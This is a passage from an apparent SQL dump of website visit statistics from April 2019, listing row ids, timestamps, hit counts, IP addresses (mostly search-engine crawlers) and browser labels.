411424,1554817137,1,1,0,0,'87.250.224.64','other'),(411425,1554817251,1,1,0,0,'95.132.49.4','firefox'),(411426,1554817450,1,1,0,0,'180.76.15.7','other'),(411427,1554817824,2,2,0,0,'66.249.64.29','chrome'),(411428,1554817999,1,1,0,0,'178.154.171.17','other'),(411429,1554818073,1,1,0,0,'66.249.64.31','chrome'),(411430,1554818127,1,1,0,0,'66.249.64.62','chrome'),(411431,1554818169,2,2,0,0,'66.249.64.30','chrome'),(411432,1554818308,1,1,0,0,'207.46.13.12','other'),(411433,1554818660,1,1,0,0,'8.29.198.25','other'),(411434,1554818926,1,1,0,0,'95.163.255.93','other'),(411435,1554819000,1,1,0,0,'66.249.64.29','chrome'),(411436,1554819092,12,12,0,0,'148.251.244.137','other'),(411437,1554819303,3,3,0,0,'66.249.64.30','chrome'),(411438,1554819477,1,1,0,0,'8.29.198.26','other'),(411439,1554819593,1,1,0,0,'66.249.64.60','chrome'),(411440,1554819957,1,1,0,0,'66.249.64.31','chrome'),(411441,1554820191,5,5,0,0,'66.249.64.29','chrome'),(411442,1554820209,3,3,0,0,'207.46.13.80','other'),(411443,1554820584,1,1,0,0,'66.249.64.62','chrome'),(411444,1554820931,1,1,0,0,'66.249.64.60','chrome'),(411445,1554821196,1,1,0,0,'66.249.64.31','chrome'),(411446,1554821254,1,1,0,0,'95.163.255.92','other'),(411447,1554821388,3,3,0,0,'66.249.64.30','chrome'),(411448,1554821394,1,1,0,0,'66.249.64.58','chrome'),(411449,1554821453,2,2,0,0,'66.249.64.29','chrome'),(411450,1554821475,1,1,0,0,'207.46.13.13','other'),(411451,1554821853,1,1,0,0,'66.249.64.60','chrome'),(411452,1554822155,1,1,0,0,'87.250.224.64','other'),(411453,1554822180,1,1,0,0,'95.108.181.54','other'),(411454,1554822230,1,1,0,0,'178.154.171.69','other'),(411455,1554822887,1,1,0,0,'207.46.13.80','other'),(411456,1554824559,3,3,0,0,'176.9.9.94','other'),(411457,1554824597,1,1,0,0,'66.249.64.30','chrome'),(411458,1554824656,1,1,0,0,'66.249.64.31','chrome'),(411459,1554825234,1,1,0,0,'207.244.105.9','chrome'),(411460,1554826334,3,3,0,0,'66.249.64.30','chrome'),(411461,1554826481,1,1,0,0,'91.196.178.92','firefox'),(411462,1554826597,1,1,0,0,'93.73.173.105','chrome'),(411463,1554827156,2,2,0,0,'66.249.64.31','chrome'),(411464,1554827193,2,2,0,0,'66.249.64.29','chrome'),(411465,1554827239,1,1,0,0,'66.249.64.30','chrome'),(411466,1554827270,1,1,0,0,'95.163.255.171','other'),(411467,1554827283,3,3,0,0,'95.163.255.96','other'),(411468,1554827851,1,1,0,0,'66.249.64.60','chrome'),(411469,1554827865,2,2,0,0,'5.45.207.79','other'),(411470,1554828268,1,1,0,0,'66.249.64.29','chrome'),(411471,1554829041,1,1,0,0,'66.249.64.31','chrome'),(411472,1554829508,1,1,0,0,'8.29.198.25','other'),(411473,1554829539,2,2,0,0,'66.249.64.58','chrome'),(411474,1554829570,2,2,0,0,'66.249.64.30','chrome'),(411475,1554830133,1,1,0,0,'66.249.64.62','chrome'),(411476,1554830162,1,1,0,0,'66.249.64.60','chrome'),(411477,1554830205,1,1,0,0,'91.209.11.236','other'),(411478,1554830337,1,1,0,0,'8.29.198.26','other'),(411479,1554830407,2,2,0,0,'66.249.64.29','chrome'),(411480,1554830539,3,3,0,0,'66.249.64.31','chrome'),(411481,1554830689,2,2,0,0,'40.77.167.163','other'),(411482,1554831457,1,1,0,0,'207.46.13.32','other'),(411483,1554831820,2,2,0,0,'207.46.13.13','other'),(411484,1554832452,1,1,0,0,'87.250.224.47','other'),(411485,1554832518,1,1,0,0,'66.249.64.31','chrome'),(411486,1554832615,1,1,0,0,'95.108.213.4','other'),(411487,1554832617,1,1,0,0,'13.66.139.0','other'),(411488,1554832758,1,1,0,0,'95.163.255.98','other'),(411489,1554832905,1,1,0,0,'178.154.244.11','other'),(411490,1554833169,1,1,0,0,'93.72.110.233','other'),(411491,1554833235,1,1,0,0,'66.249.64.29','chrome'),(411492,1554834484,1,1,0,0,'207.46.13.13','other'),(411493,1554834621,1,1,0,0,'40.77.167.163','other'),(411494,1554834622,2,2,0,0,'66.249.64.31','chrome'),(411495,1554834950,3,3,0,0,'66.249.64.30','chrome'),(411496,1554835084,2,2,0,0,'66.249.64.29','chrome'),(411497,1554835943,2,2,0,0,'66.249.64.30','chrome'),(411498,1554836066,1,1,0,0,'66.249.64.31','chrome'),(411499,1554836115,2,2,0,0,'5.45.207.79','other'),(411500,1554836151,1,1,0,0,'66.249.64.29','chrome'),(411501,1554836154,1,1,0,0,'87.250.224.47','other'),(411502,1554836217,1,1,0,0,'178.154.244.11','other'),(411503,1554836247,1,1,0,0,'66.249.64.60','chrome'),(411504,1554836312,1,1,0,0,'46.174.71.81','firefox'),(411505,1554837025,1,1,0,0,'207.46.13.32','other'),(411506,1554837288,2,2,0,0,'66.249.64.29','chrome'),(411507,1554837342,2,2,0,0,'66.249.64.30','chrome'),(411508,1554837616,1,1,0,0,'66.249.64.60','chrome'),(411509,1554838027,1,1,0,0,'40.77.167.108','other'),(411510,1554838384,1,1,0,0,'91.196.178.176','chrome'),(411511,1554838811,13,13,0,0,'148.251.9.145','other'),(411512,1554838974,1,1,0,0,'95.163.255.95','other'),(411513,1554839014,1,1,0,0,'66.249.64.30','chrome'),(411514,1554839020,3,3,0,0,'66.249.64.58','chrome'),(411515,1554839262,1,1,0,0,'66.249.64.31','chrome'),(411516,1554839333,3,3,0,0,'66.249.64.29','chrome'),(411517,1554839998,1,1,0,0,'213.180.203.53','other'),(411518,1554840037,1,1,0,0,'37.9.113.38','other'),(411519,1554840232,1,1,0,0,'5.45.207.19','other'),(411520,1554840288,2,2,0,0,'141.8.142.103','other'),(411521,1554840315,2,2,0,0,'46.174.71.81','firefox'),(411522,1554840352,1,1,0,0,'8.29.198.25','other'),(411523,1554840539,1,1,0,0,'95.163.255.98','other'),(411524,1554840554,2,2,0,0,'66.249.64.60','chrome'),(411525,1554840653,1,1,0,0,'13.66.139.0','other'),(411526,1554840836,2,2,0,0,'66.249.64.29','chrome'),(411527,1554841185,1,1,0,0,'8.29.198.26','other'),(411528,1554841654,1,1,0,0,'66.249.64.31','chrome'),(411529,1554841731,8,8,0,0,'176.9.9.94','other'),(411530,1554841883,2,2,0,0,'66.249.64.60','chrome'),(411531,1554842095,1,1,0,0,'66.249.64.58','chrome'),(411532,1554842463,1,1,0,0,'66.249.64.62','chrome'),(411533,1554842635,2,2,0,0,'176.9.9.94','other'),(411534,1554842897,1,1,0,0,'31.41.89.65','chrome'),(411535,1554843880,3,3,0,0,'66.249.64.29','chrome'),(411536,1554843969,2,2,0,0,'31.41.89.65','chrome'),(411537,1554843994,1,1,0,0,'5.45.207.79','other'),(411538,1554844074,2,2,0,0,'66.249.64.60','chrome'),(411539,1554844079,2,2,0,0,'5.45.207.19','other'),(411540,1554844122,1,1,0,0,'31.41.93.55','other'),(411541,1554844352,1,1,0,0,'178.154.244.11','other'),(411542,1554844383,1,1,0,0,'37.9.113.148','other'),(411543,1554844525,1,1,0,0,'95.163.255.93','other'),(411544,1554844644,2,2,0,0,'66.249.64.31','chrome'),(411545,1554844844,1,1,0,0,'95.163.255.95','other'),(411546,1554844849,1,1,0,0,'95.163.255.92','other'),(411547,1554844852,1,1,0,0,'95.163.255.96','other'),(411548,1554845072,2,2,0,0,'66.249.64.60','chrome'),(411549,1554846118,3,3,0,0,'66.249.64.31','chrome'),(411550,1554846233,1,1,0,0,'95.163.255.92','other'),(411551,1554846391,4,4,0,0,'66.249.64.29','chrome'),(411552,1554846439,2,2,0,0,'66.249.64.62','chrome'),(411553,1554846628,1,0,1,0,'66.249.64.30',''),(411554,1554846899,1,1,0,0,'66.249.64.60','chrome'),(411555,1554847052,2,2,0,0,'66.249.64.30','chrome'),(411556,1554847182,2,2,0,0,'66.249.64.31','chrome'),(411557,1554847808,1,1,0,0,'66.249.64.60','chrome'),(411558,1554848040,1,1,0,0,'66.249.64.30','chrome'),(411559,1554848106,1,1,0,0,'91.242.162.131','other'),(411560,1554848494,1,1,0,0,'91.132.138.42','firefox'),(411561,1554848884,2,2,0,0,'157.55.39.135','other'),(411562,1554849081,3,3,0,0,'66.249.64.31','chrome'),(411563,1554849592,1,1,0,0,'69.30.221.250','other'),(411564,1554849650,2,2,0,0,'66.249.64.58','chrome'),(411565,1554850453,1,1,0,0,'66.249.64.30','chrome'),(411566,1554850583,1,1,0,0,'95.163.255.95','other'),(411567,1554851026,1,1,0,0,'207.46.13.233','other'),(411568,1554851177,1,1,0,0,'66.249.64.60','chrome'),(411569,1554851200,1,1,0,0,'8.29.198.26','other'),(411570,1554851652,1,1,0,0,'66.249.64.30','chrome'),(411571,1554851660,1,1,0,0,'66.249.64.29','chrome'),(411572,1554851777,1,1,0,0,'66.249.64.62','chrome'),(411573,1554851792,1,1,0,0,'66.249.64.31','chrome'),(411574,1554852033,1,1,0,0,'8.29.198.27','other'),(411575,1554852162,1,1,0,0,'5.45.207.19','other'),(411576,1554852265,1,1,0,0,'95.163.255.97','other'),(411577,1554852625,1,1,0,0,'66.249.64.29','chrome'),(411578,1554852847,3,3,0,0,'66.249.64.30','chrome'),(411579,1554852928,1,1,0,0,'66.249.64.31','chrome'),(411580,1554853240,1,1,0,0,'207.46.13.16','other'),(411581,1554853274,1,1,0,0,'40.77.167.222','other'),(411582,1554855681,1,1,0,0,'66.249.64.30','chrome'),(411583,1554855720,3,3,0,0,'66.249.64.29','chrome'),(411584,1554855843,1,1,0,0,'78.46.176.21','other'),(411585,1554855985,1,1,0,0,'157.55.39.135','other'),(411586,1554856360,3,3,0,0,'141.8.142.103','other'),(411587,1554856382,3,3,0,0,'178.154.244.11','other'),(411588,1554856456,1,1,0,0,'66.249.64.58','chrome'),(411589,1554856463,1,1,0,0,'95.163.255.98','other'),(411590,1554856510,1,1,0,0,'66.249.64.60','chrome'),(411591,1554856565,1,1,0,0,'95.163.255.99','other'),(411592,1554856573,1,1,0,0,'95.163.255.97','other'),(411593,1554856576,1,1,0,0,'95.163.255.96','other'),(411594,1554857834,2,2,0,0,'66.249.64.62','chrome'),(411595,1554857847,2,2,0,0,'66.249.64.29','chrome'),(411596,1554857987,1,1,0,0,'95.163.255.94','other'),(411597,1554858169,1,1,0,0,'66.249.64.30','chrome'),(411598,1554858741,1,1,0,0,'207.46.13.233','other'),(411599,1554859391,4,4,0,0,'144.76.176.171','other'),(411600,1554859651,1,1,0,0,'66.249.64.30','chrome'),(411601,1554859808,1,1,0,0,'66.249.64.29','chrome'),(411602,1554859938,2,2,0,0,'66.249.64.60','chrome'),(411603,1554861040,1,1,0,0,'157.55.39.220','other'),(411604,1554861261,3,3,0,0,'66.249.64.30','chrome'),(411605,1554862049,2,2,0,0,'8.29.198.27','other'),(411606,1554862440,1,1,0,0,'95.108.213.4','other'),(411607,1554862491,1,1,0,0,'157.55.39.204','other'),(411608,1554862567,1,1,0,0,'66.249.64.31','chrome'),(411609,1554862618,2,2,0,0,'66.249.64.30','chrome'),(411610,1554862709,1,1,0,0,'141.8.142.144','other'),(411611,1554862797,1,1,0,0,'87.250.224.118','other'),(411612,1554863045,1,1,0,0,'95.108.181.83','other'),(411613,1554863584,2,2,0,0,'52.24.123.247','chrome'),(411614,1554863736,2,2,0,0,'66.249.64.29','chrome'),(411615,1554863975,1,1,0,0,'157.55.39.211','other'),(411616,1554864765,1,1,0,0,'66.249.64.30','chrome'),(411617,1554864789,3,3,0,0,'148.251.195.14','other'),(411618,1554864962,1,1,0,0,'109.74.154.72','chrome'),(411619,1554864969,1,1,0,0,'66.249.64.29','chrome'),(411620,1554865231,1,1,0,0,'66.249.64.60','chrome'),(411621,1554866144,2,2,0,0,'66.249.64.31','chrome'),(411622,1554866156,2,2,0,0,'66.249.64.29','chrome'),(411623,1554866179,1,1,0,0,'157.55.39.204','other'),(411624,1554866182,1,1,0,0,'66.249.64.30','chrome'),(411625,1554866618,1,1,0,0,'157.55.39.211','other'),(411626,1554866825,1,1,0,0,'157.55.39.220','other'),(411627,1554866938,1,1,0,0,'66.249.64.60','chrome'),(411628,1554867094,1,1,0,0,'66.249.64.30','chrome'),(411629,1554867898,1,1,0,0,'5.45.207.19','other'),(411630,1554868017,1,1,0,0,'66.249.64.31','chrome'),(411631,1554868066,1,1,0,0,'95.163.255.96','other'),(411632,1554868171,1,1,0,0,'95.163.255.92','other'),(411633,1554868873,3,3,0,0,'66.249.64.30','chrome'),(411634,1554868885,1,1,0,0,'157.55.39.120','other'),(411635,1554869013,3,3,0,0,'66.249.64.29','chrome'),(411636,1554869141,1,1,0,0,'66.249.64.62','chrome'),(411637,1554869191,1,1,0,0,'141.8.142.103','other'),(411638,1554869245,1,1,0,0,'66.249.64.58','chrome'),(411639,1554869246,1,1,0,0,'5.45.207.79','other'),(411640,1554869810,2,2,0,0,'5.45.207.19','other'),(411641,1554869836,3,3,0,0,'66.249.64.31','chrome'),(411642,1554869883,1,1,0,0,'178.154.244.11','other'),(411643,1554869908,1,1,0,0,'66.249.64.30','chrome'),(411644,1554871046,1,1,0,0,'66.249.64.29','chrome'),(411645,1554871250,1,1,0,0,'66.249.64.60','chrome'),(411646,1554871471,1,1,0,0,'157.55.39.211','other'),(411647,1554871545,1,1,0,0,'66.249.64.31','chrome'),(411648,1554871570,1,1,0,0,'178.154.244.11','other'),(411649,1554871760,9,9,0,0,'176.9.9.94','other'),(411650,1554871826,1,1,0,0,'185.201.115.21','other'),(411651,1554871828,2,2,0,0,'66.249.64.30','chrome'),(411652,1554872405,2,2,0,0,'40.77.167.174','other'),(411653,1554872575,1,1,0,0,'66.249.64.58','chrome'),(411654,1554872663,6,6,0,0,'176.9.9.94','other'),(411655,1554872895,2,2,0,0,'8.29.198.27','other'),(411656,1554873015,1,1,0,0,'66.249.64.29','chrome'),(411657,1554873137,1,1,0,0,'157.55.39.96','other'),(411658,1554873257,1,1,0,0,'66.249.64.30','chrome'),(411659,1554873918,1,1,0,0,'91.196.178.66','chrome'),(411660,1554873978,1,1,0,0,'95.163.255.99','other'),(411661,1554873983,1,1,0,0,'95.163.255.94','other'),(411662,1554874025,2,2,0,0,'66.249.64.31','chrome'),(411663,1554874375,1,1,0,0,'109.70.100.22','other'),(411664,1554874425,2,2,0,0,'66.249.64.29','chrome'),(411665,1554874886,1,1,0,0,'91.196.178.66','chrome'),(411666,1554875099,1,1,0,0,'95.163.255.98','other'),(411667,1554875264,1,1,0,0,'95.163.255.99','other'),(411668,1554875612,1,1,0,0,'66.249.64.62','chrome'),(411669,1554875672,1,1,0,0,'66.102.9.60','chrome'),(411670,1554875710,1,1,0,0,'66.249.64.31','chrome'),(411671,1554875718,1,1,0,0,'91.209.11.236','other'),(411672,1554876094,2,1,1,0,'66.249.64.29',''),(411673,1554876522,1,1,0,0,'66.249.64.30','chrome'),(411674,1554876891,1,1,0,0,'40.77.167.76','other'),(411675,1554877126,1,1,0,0,'66.249.64.62','chrome'),(411676,1554877181,3,3,0,0,'5.45.207.19','other'),(411677,1554877219,1,1,0,0,'66.249.64.60','chrome'),(411678,1554877504,6,6,0,0,'5.45.207.79','other'),(411679,1554877542,2,2,0,0,'66.249.64.29','chrome'),(411680,1554877556,1,1,0,0,'178.154.244.11','other'),(411681,1554878430,1,1,0,0,'176.108.15.179','chrome'),(411682,1554878679,1,1,0,0,'157.55.39.71','other'),(411683,1554878934,1,1,0,0,'66.249.64.62','chrome'),(411684,1554879182,1,1,0,0,'37.55.240.131','other'),(411685,1554879207,1,1,0,0,'95.108.213.4','other'),(411686,1554879477,1,1,0,0,'157.55.39.96','other'),(411687,1554879704,1,1,0,0,'95.158.63.5','chrome'),(411688,1554879723,1,1,0,0,'91.196.178.66','chrome'),(411689,1554880480,1,1,0,0,'157.55.39.71','other'),(411690,1554881130,1,1,0,0,'95.163.255.92','other'),(411691,1554881137,1,1,0,0,'95.163.255.97','other'),(411692,1554881141,1,1,0,0,'46.166.190.159','other'),(411693,1554881273,3,3,0,0,'66.249.64.29','chrome'),(411694,1554881353,1,1,0,0,'66.249.64.30','chrome'),(411695,1554881615,1,1,0,0,'40.77.167.124','other'),(411696,1554881819,1,1,0,0,'157.55.39.71','other'),(411697,1554881860,1,1,0,0,'66.249.64.31','chrome'),(411698,1554882253,1,1,0,0,'91.196.178.176','chrome'),(411699,1554882788,1,1,0,0,'66.102.9.58','chrome'),(411700,1554882913,1,1,0,0,'91.196.178.66','chrome'),(411701,1554883480,3,3,0,0,'66.249.64.29','chrome'),(411702,1554883495,1,1,0,0,'66.249.64.60','chrome'),(411703,1554883742,1,1,0,0,'8.29.198.27','other'),(411704,1554883971,1,1,0,0,'66.249.64.31','chrome'),(411705,1554884073,1,1,0,0,'66.249.64.62','chrome'),(411706,1554884136,1,1,0,0,'40.77.167.124','other'),(411707,1554884629,1,1,0,0,'8.29.198.26','other'),(411708,1554884932,1,1,0,0,'141.8.142.191','other'),(411709,1554885281,1,1,0,0,'157.55.39.96','other'),(411710,1554885436,1,1,0,0,'66.249.64.58','chrome'),(411711,1554885566,1,1,0,0,'66.249.64.31','chrome'),(411712,1554885586,1,1,0,0,'95.108.181.57','other'),(411713,1554885712,1,1,0,0,'141.8.142.162','other'),(411714,1554885934,1,1,0,0,'66.249.64.62','chrome'),(411715,1554886027,1,1,0,0,'66.249.64.30','chrome'),(411716,1554886065,1,1,0,0,'66.249.64.29','chrome'),(411717,1554886450,1,1,0,0,'178.154.171.17','other'),(411718,1554886875,1,1,0,0,'77.111.244.96','chrome'),(411719,1554887177,2,2,0,0,'66.249.64.31','chrome'),(411720,1554887326,1,1,0,0,'66.249.64.29','chrome'),(411721,1554888006,1,1,0,0,'94.178.0.180','opera'),(411722,1554888319,1,1,0,0,'95.132.5.166','chrome'),(411723,1554888497,1,1,0,0,'66.249.64.60','chrome'),(411724,1554888801,1,1,0,0,'95.132.5.166','firefox'),(411725,1554888875,1,1,0,0,'180.76.15.22','other'),(411726,1554889334,2,2,0,0,'157.55.39.55','other'),(411727,1554889337,3,3,0,0,'157.55.39.71','other'),(411728,1554889345,2,2,0,0,'157.55.39.96','other'),(411729,1554889407,6,6,0,0,'40.77.167.110','other'),(411730,1554889787,1,1,0,0,'66.249.64.62','chrome'),(411731,1554890557,3,3,0,0,'66.249.64.29','chrome'),(411732,1554891290,2,2,0,0,'95.213.141.126','opera'),(411733,1554891309,1,1,0,0,'46.133.46.86','chrome'),(411734,1554891343,1,1,0,0,'66.249.64.30','chrome'),(411735,1554892101,1,1,0,0,'130.180.220.14','chrome'),(411736,1554892147,2,2,0,0,'66.249.64.29','chrome'),(411737,1554892343,1,1,0,0,'40.77.167.51','other'),(411738,1554892495,1,1,0,0,'77.111.244.203','chrome'),(411739,1554893276,1,1,0,0,'40.77.167.51','other'),(411740,1554893624,1,1,0,0,'66.249.64.62','chrome'),(411741,1554894173,1,1,0,0,'66.249.64.60','chrome'),(411742,1554894189,1,1,0,0,'207.46.13.88','other'),(411743,1554894519,2,2,0,0,'66.249.64.30','chrome'),(411744,1554894585,1,1,0,0,'8.29.198.27','other'),(411745,1554894980,1,1,0,0,'95.163.255.93','other'),(411746,1554895400,3,3,0,0,'66.249.64.31','chrome'),(411747,1554895433,1,1,0,0,'60.191.38.77','firefox'),(411748,1554895484,1,1,0,0,'8.29.198.26','other'),(411749,1554896014,1,1,0,0,'178.154.171.24','other'),(411750,1554896076,1,1,0,0,'66.249.64.29','chrome'),(411751,1554896408,1,1,0,0,'66.249.64.31','chrome'),(411752,1554896534,1,1,0,0,'66.249.64.30','chrome'),(411753,1554897365,1,1,0,0,'157.55.39.55','other'),(411754,1554897595,2,2,0,0,'66.249.64.29','chrome'),(411755,1554897699,1,1,0,0,'91.132.138.42','firefox'),(411756,1554897859,1,1,0,0,'40.77.167.51','other'),(411757,1554898771,5,5,0,0,'176.9.9.94','other'),(411758,1554899028,1,1,0,0,'217.69.143.46','other'),(411759,1554899530,1,1,0,0,'178.95.247.170','chrome'),(411760,1554899891,1,1,0,0,'157.55.39.55','other'),(411761,1554900010,1,1,0,0,'66.249.64.31','chrome'),(411762,1554900130,1,1,0,0,'193.106.30.98','firefox'),(411763,1554901023,1,1,0,0,'66.249.64.31','chrome'),(411764,1554901104,2,2,0,0,'91.196.178.79','firefox'),(411765,1554901123,1,1,0,0,'42.236.10.125','other'),(411766,1554901153,2,2,0,0,'180.163.220.4','other'),(411767,1554901269,2,2,0,0,'42.236.10.114','other'),(411768,1554901304,1,1,0,0,'42.236.10.75','other'),(411769,1554901311,1,0,1,0,'66.249.64.29',''),(411770,1554901337,1,1,0,0,'180.163.220.68','other'),(411771,1554901468,1,1,0,0,'42.236.10.117','other'),(411772,1554901658,1,1,0,0,'40.77.167.51','other'),(411773,1554902006,1,1,0,0,'95.163.255.92','other'),(411774,1554902468,2,2,0,0,'207.46.13.88','other'),(411775,1554903403,1,1,0,0,'40.77.167.158','other'),(411776,1554904323,1,1,0,0,'91.196.178.66','chrome'),(411777,1554904752,2,2,0,0,'66.249.64.31','chrome'),(411778,1554905363,1,1,0,0,'178.154.244.11','other'),(411779,1554905367,1,1,0,0,'5.45.207.19','other'),(411780,1554905427,1,1,0,0,'8.29.198.25','other'),(411781,1554905456,1,1,0,0,'141.8.142.103','other'),(411782,1554905493,4,4,0,0,'66.249.64.29','chrome'),(411783,1554905656,1,1,0,0,'40.77.167.51','other'),(411784,1554905922,1,1,0,0,'91.196.178.93','firefox'),(411785,1554906006,1,1,0,0,'5.45.207.79','other'),(411786,1554906085,1,1,0,0,'95.163.255.93','other'),(411787,1554906087,1,1,0,0,'95.163.255.97','other'),(411788,1554906347,1,1,0,0,'8.29.198.27','other'),(411789,1554906719,1,1,0,0,'207.46.13.88','other'),(411790,1554906853,1,1,0,0,'207.46.13.187','other'),(411791,1554907142,3,3,0,0,'66.249.64.31','chrome'),(411792,1554907280,1,1,0,0,'37.9.113.148','other'),(411793,1554907383,1,1,0,0,'40.77.167.158','other'),(411794,1554907678,1,1,0,0,'66.249.64.29','chrome'),(411795,1554908820,1,1,0,0,'185.34.224.10','chrome'),(411796,1554909278,2,2,0,0,'66.249.64.29','chrome'),(411797,1554909324,3,3,0,0,'66.249.64.30','chrome'),(411798,1554909469,1,1,0,0,'66.249.64.58','chrome'),(411799,1554910773,1,1,0,0,'66.249.64.62','chrome'),(411800,1554911058,2,2,0,0,'207.46.13.88','other'),(411801,1554911072,4,4,0,0,'66.249.64.31','chrome'),(411802,1554911735,1,1,0,0,'46.219.254.26','chrome'),(411803,1554911785,2,2,0,0,'95.163.255.96','other'),(411804,1554912610,1,1,0,0,'157.55.39.216','other'),(411805,1554912821,1,1,0,0,'66.249.64.30','chrome'),(411806,1554912960,1,1,0,0,'66.249.64.29','chrome'),(411807,1554913902,1,1,0,0,'37.204.254.29','chrome'),(411808,1554914169,3,3,0,0,'95.108.213.4','other'),(411809,1554914239,3,3,0,0,'5.45.207.79','other'),(411810,1554914353,1,1,0,0,'87.250.224.65','other'),(411811,1554914420,2,2,0,0,'178.154.244.11','other'),(411812,1554914595,1,1,0,0,'5.45.207.19','other'),(411813,1554915061,1,1,0,0,'141.8.142.103','other'),(411814,1554915169,1,1,0,0,'66.249.64.58','chrome'),(411815,1554915469,1,1,0,0,'66.249.64.31','chrome'),(411816,1554916274,1,1,0,0,'8.29.198.26','other'),(411817,1554916613,1,1,0,0,'66.249.64.29','chrome'),(411818,1554916824,1,1,0,0,'66.249.64.62','chrome'),(411819,1554916905,1,1,0,0,'40.77.167.140','other'),(411820,1554917050,1,1,0,0,'157.55.39.216','other'),(411821,1554917207,1,1,0,0,'8.29.198.26','other'),(411822,1554917783,2,2,0,0,'66.249.64.31','chrome'),(411823,1554918314,1,1,0,0,'66.249.64.60','chrome'),(411824,1554918800,2,2,0,0,'207.46.13.229','other'),(411825,1554918920,1,1,0,0,'95.163.255.97','other'),(411826,1554918967,1,1,0,0,'95.163.255.92','other'),(411827,1554919431,1,1,0,0,'66.249.64.29','chrome'),(411828,1554920003,2,2,0,0,'66.249.64.31','chrome'),(411829,1554920823,1,1,0,0,'66.249.64.62','chrome'),(411830,1554920879,1,1,0,0,'66.249.64.60','chrome'),(411831,1554921116,1,1,0,0,'66.249.64.31','chrome'),(411832,1554921513,1,1,0,0,'213.180.203.53','other'),(411833,1554921618,1,1,0,0,'104.148.64.26','chrome'),(411834,1554921785,3,3,0,0,'5.45.207.79','other'),(411835,1554921851,1,1,0,0,'87.250.224.47','other'),(411836,1554921902,1,1,0,0,'157.55.39.216','other'),(411837,1554921912,1,1,0,0,'5.45.207.19','other'),(411838,1554921942,1,1,0,0,'207.46.13.229','other'),(411839,1554922278,2,2,0,0,'40.77.167.140','other'),(411840,1554922330,1,1,0,0,'176.9.9.94','other'),(411841,1554922600,1,1,0,0,'207.46.13.3','other'),(411842,1554922855,1,1,0,0,'95.163.255.93','other'),(411843,1554923349,1,1,0,0,'66.249.64.29','chrome'),(411844,1554924008,1,1,0,0,'91.196.178.77','chrome'),(411845,1554924388,1,1,0,0,'37.54.17.209','chrome'),(411846,1554924448,1,1,0,0,'95.163.255.97','other'),(411847,1554924450,1,1,0,0,'95.163.255.94','other'),(411848,1554924559,1,1,0,0,'95.163.255.95','other'),(411849,1554924763,1,1,0,0,'178.154.244.11','other'),(411850,1554924926,2,2,0,0,'66.249.64.62','chrome'),(411851,1554925014,1,1,0,0,'66.249.64.29','chrome'),(411852,1554925217,1,1,0,0,'207.46.13.229','other'),(411853,1554925537,1,1,0,0,'66.249.64.30','chrome'),(411854,1554925546,1,1,0,0,'66.249.64.60','chrome'),(411855,1554926304,1,1,0,0,'5.45.207.79','other'),(411856,1554926305,1,1,0,0,'141.8.142.103','other'),(411857,1554926507,1,1,0,0,'207.46.13.3','other'),(411858,1554927119,1,1,0,0,'8.29.198.26','other'),(411859,1554927538,1,1,0,0,'66.249.64.31','chrome'),(411860,1554927555,2,2,0,0,'66.249.64.29','chrome'),(411861,1554927893,1,1,0,0,'66.249.64.60','chrome'),(411862,1554928067,1,1,0,0,'8.29.198.27','other'),(411863,1554928284,1,1,0,0,'40.77.167.34','other'),(411864,1554928631,1,1,0,0,'95.163.255.94','other'),(411865,1554929082,1,1,0,0,'66.249.64.30','chrome'),(411866,1554929348,1,1,0,0,'40.77.167.34','other'),(411867,1554930328,1,1,0,0,'95.163.255.98','other'),(411868,1554930506,2,2,0,0,'207.46.13.229','other'),(411869,1554930754,1,1,0,0,'40.77.167.97','other'),(411870,1554930896,1,1,0,0,'66.249.64.31','chrome'),(411871,1554930917,1,1,0,0,'66.249.64.30','chrome'),(411872,1554931958,1,1,0,0,'40.77.167.97','other'),(411873,1554932392,1,1,0,0,'66.249.64.31','chrome'),(411874,1554933252,1,1,0,0,'66.249.64.60','chrome'),(411875,1554933361,3,3,0,0,'141.8.142.103','other'),(411876,1554933390,3,3,0,0,'207.46.13.229','other'),(411877,1554934010,1,1,0,0,'66.249.64.30','chrome'),(411878,1554934172,2,2,0,0,'66.249.64.29','chrome'),(411879,1554934699,1,1,0,0,'5.45.207.79','other'),(411880,1554934751,1,1,0,0,'66.249.64.60','chrome'),(411881,1554935360,1,1,0,0,'66.249.64.58','chrome'),(411882,1554935518,2,2,0,0,'193.29.187.120','other'),(411883,1554936128,1,1,0,0,'180.76.15.142','other'),(411884,1554936244,2,2,0,0,'66.249.64.29','chrome'),(411885,1554937958,1,1,0,0,'8.29.198.27','other'),(411886,1554938128,1,1,0,0,'180.76.15.135','other'),(411887,1554938199,1,1,0,0,'40.77.167.97','other'),(411888,1554938296,1,1,0,0,'13.66.139.0','other'),(411889,1554938500,1,1,0,0,'77.106.254.217','chrome'),(411890,1554938790,1,1,0,0,'141.8.142.38','other'),(411891,1554938794,1,1,0,0,'141.8.142.191','other'),(411892,1554938799,1,1,0,0,'66.249.64.60','chrome'),(411893,1554938836,1,1,0,0,'5.45.207.19','other'),(411894,1554938914,1,1,0,0,'8.29.198.26','other'),(411895,1554939258,2,2,0,0,'178.154.244.11','other'),(411896,1554939295,1,1,0,0,'141.8.142.103','other'),(411897,1554939298,1,1,0,0,'66.249.64.31','chrome'),(411898,1554939668,1,1,0,0,'188.32.229.11','chrome'),(411899,1554940164,1,1,0,0,'178.154.244.11','other'),(411900,1554940188,4,4,0,0,'207.46.13.216','other'),(411901,1554940198,4,4,0,0,'40.77.167.26','other'),(411902,1554940207,5,5,0,0,'157.55.39.66','other'),(411903,1554940214,6,6,0,0,'40.77.167.196','other'),(411904,1554941109,1,1,0,0,'66.249.64.29','chrome'),(411905,1554941404,1,1,0,0,'66.249.64.62','chrome'),(411906,1554941473,2,2,0,0,'176.9.9.94','other'),(411907,1554941641,1,1,0,0,'95.163.255.92','other'),(411908,1554941643,1,1,0,0,'207.46.13.216','other'),(411909,1554941878,1,1,0,0,'40.77.167.166','other'),(411910,1554942659,1,1,0,0,'66.249.64.58','chrome'),(411911,1554943712,1,1,0,0,'5.45.207.19','other'),(411912,1554944047,1,1,0,0,'66.249.64.29','chrome'),(411913,1554944348,1,1,0,0,'66.249.64.30','chrome'),(411914,1554945068,1,1,0,0,'157.55.39.123','other'),(411915,1554945191,1,1,0,0,'87.250.224.81','other'),(411916,1554945268,2,2,0,0,'141.8.142.38','other'),(411917,1554945424,1,1,0,0,'5.45.207.8','other'),(411918,1554946430,2,2,0,0,'66.249.64.30','chrome'),(411919,1554946434,1,1,0,0,'66.249.64.29','chrome'),(411920,1554946451,1,1,0,0,'66.249.64.31','chrome'),(411921,1554946796,1,1,0,0,'207.46.13.216','other'),(411922,1554947232,1,1,0,0,'66.249.64.60','chrome'),(411923,1554947907,1,1,0,0,'66.249.64.30','chrome'),(411924,1554948795,1,1,0